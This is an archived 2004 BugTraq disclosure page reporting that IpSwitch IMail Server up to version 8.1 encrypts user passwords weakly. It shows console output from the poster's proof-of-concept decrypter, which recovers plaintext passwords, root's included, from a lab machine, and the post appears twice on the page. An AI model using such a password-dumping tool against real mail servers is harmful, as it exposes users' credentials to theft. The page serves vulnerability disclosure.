BugTraq
Back to list
|
Post reply
IpSwitch IMail Server <= ver 8.1 User Password Decryption
Aug 16 2004 05:18PM
Adik (netninja hotmail kg)
(2 replies)
Hi fellaz,
IpSwitch IMail Server version up to 8.1 uses weak encryption algorithm to
encrypt its user passwords. Have a look at attached proof of concept tool,
which will decrypt user password from local machine instantly.
---
G:\xploits\imail_decrypt>
G:\xploits\imail_decrypt>imailpwdump -d
--= [ IpSwitch IMail Server User Password Decrypter ver 1.1] =--
(c) 2004 by Adik ( netmaniac [at] hotmail.KG )
DOMAIN: [ 192.168.65.129 ]
DOMAIN: [ win2k ]
------------------------------------------------------------------------
FullName: aselka
Email: aselka@win2k
Username: aselka
Password: p3ace
------------------------------------------------------------------------
FullName: brazilia
Email: brazilia@win2k
Username: brazilia
Password: mysupersecretpassword
------------------------------------------------------------------------
FullName: networkadmin
Email: networkadmin@win2k
Username: networkadmin
Password: c00l
------------------------------------------------------------------------
FullName: System Administrator
Email: root@win2k
Username: root
Password: password
Total: 4 Accounts
Total: 1 Domains, 4 Accounts
---
ciao,
Adik
[ reply ]
Re: IpSwitch IMail Server <= ver 8.1 User Password Decryption
Aug 19 2004 04:14AM
David E. Smith (dave technopagan org)
Re: IpSwitch IMail Server <= ver 8.1 User Password Decryption
Aug 17 2004 10:37AM
Dave Warren (dave warren devilsplayground net)
Privacy Statement
Copyright 2010, SecurityFocus
IpSwitch IMail Server version up to 8.1 uses weak encryption algorithm to
encrypt its user passwords. Have a look at attached proof of concept tool,
which will decrypt user password from local machine instantly.
---
G:\xploits\imail_decrypt>
G:\xploits\imail_decrypt>imailpwdump -d
--= [ IpSwitch IMail Server User Password Decrypter ver 1.1] =--
(c) 2004 by Adik ( netmaniac [at] hotmail.KG )
DOMAIN: [ 192.168.65.129 ]
DOMAIN: [ win2k ]
------------------------------------------------------------------------
FullName: aselka
Email: aselka@win2k
Username: aselka
Password: p3ace
------------------------------------------------------------------------
FullName: brazilia
Email: brazilia@win2k
Username: brazilia
Password: mysupersecretpassword
------------------------------------------------------------------------
FullName: networkadmin
Email: networkadmin@win2k
Username: networkadmin
Password: c00l
------------------------------------------------------------------------
FullName: System Administrator
Email: root@win2k
Username: root
Password: password
Total: 4 Accounts
Total: 1 Domains, 4 Accounts
---
ciao,
Adik
[ reply ]